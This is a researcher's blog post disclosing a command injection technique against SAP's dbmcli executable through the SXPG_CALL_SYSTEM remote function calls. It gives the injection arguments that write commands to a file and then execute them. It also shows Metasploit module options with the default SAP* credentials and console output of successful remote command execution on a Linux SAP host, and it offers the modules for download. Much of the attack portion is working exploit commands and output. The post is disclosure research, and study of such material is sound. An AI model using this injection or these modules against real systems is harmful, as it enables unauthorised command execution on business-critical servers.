SAP Parameter Injection
on 3 September, 2012
To quote Homer J Simpson, “All this computer hacking is making me thirsty. I think I’ll order a Tab”.
Very apt words as I’ve been busy authoring many SAP MSF modules that I intend to release over the coming months coinciding with the delivery of my updated “SAP Slapping” materials at the Sec-T, T2 and DeepSec conferences. However I’ve decided to release a subset today as a small taster of what is to come.
Context IS recently identified and reported a vulnerability within SAP’s Host Control service. This vulnerability can be used to achieve remote unauthenticated arbitrary command execution on Windows SAP systems. This is possible on systems that make use of SAP MaxDB as the supporting database. The exploitation of this vulnerability requires the submission of arbitrary parameters to the dbmcli executable and the executable is part of the SAP MaxDB installation.
The technique employed involves causing the executable to write attacker-controlled inputs to an attacker-controlled file. The executable is then used to read commands to execute from the same file. For example passing the following command line to the dbmcli executable results in the creation of a file named pwned.txt in the /tmp folder.
-o /tmp/pwned.txt –n pwnie\n!id\tfoo\n
The contents of the file are presented below.
Error! Connection failed to node pwnie
!id
for database (no dbname):
unknown host pwnie
!id
(see /etc/hosts
If the file is passed to the binary as illustrated in the command line below, then the commands prepended with an exclamation mark will be executed (in this case twice).
-ic /tmp/pwned.txt
The Remote Function Calls (RFCs) SXPG_CALL_SYSTEM and SXPG_COMMAND_EXEC can be used remotely to execute OS commands on SAP systems (as configured in transaction SM69). I previously blogged about this and the post can be found here. Authentication and relevant permissions are required.
On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands by injecting metacharacters; however on Linux they cannot – until now of course. By making use of the same exploit technique that Context IS did for the exploitation of the SAP Host Control vulnerability, we can execute arbitrary commands against Linux systems.
I have crafted several Metasploit modules to demonstrate this vector and the execution of the RFC SXPG_CALL_SYSTEM via the SOAP connector can be seen below.
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show options
Module options (auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CLIENT 001 yes Client
CMD id yes Command to run
OS Linux yes Windows/Linux
PASS 06071992 yes Password
Proxies no Use a proxy chain
RHOSTS 172.16.252.150 yes SAP ICM server address
RPORT 8042 yes SAP ICM server port number
THREADS 1 yes The number of concurrent threads
USER SAP* yes Username
VHOST no HTTP server virtual host
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================
Output
------
;!id
uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > set CMD uname -a
CMD => uname -a
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================
Output
------
;!uname -a
Linux linux-gateway 2.6.32.43-0.4-default #1 SMP 2011-07-14 14:47:44 +0200 x86_64 x86_64 x86_64 GNU/Linux
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The output below illustrates the execution of the RFC SXPG_CALL_SYSTEM from the module directly against the RFC connector.
msf auxiliary(sap_rfc_dbmcli_sxpg_call_system_command_exec) > run
[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992
[SAP] Command Exec
==================
Output
------
>!id
uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
These modules and many more will be released and submitted to the framework very soon. In the mean time you can download the modules to try from here: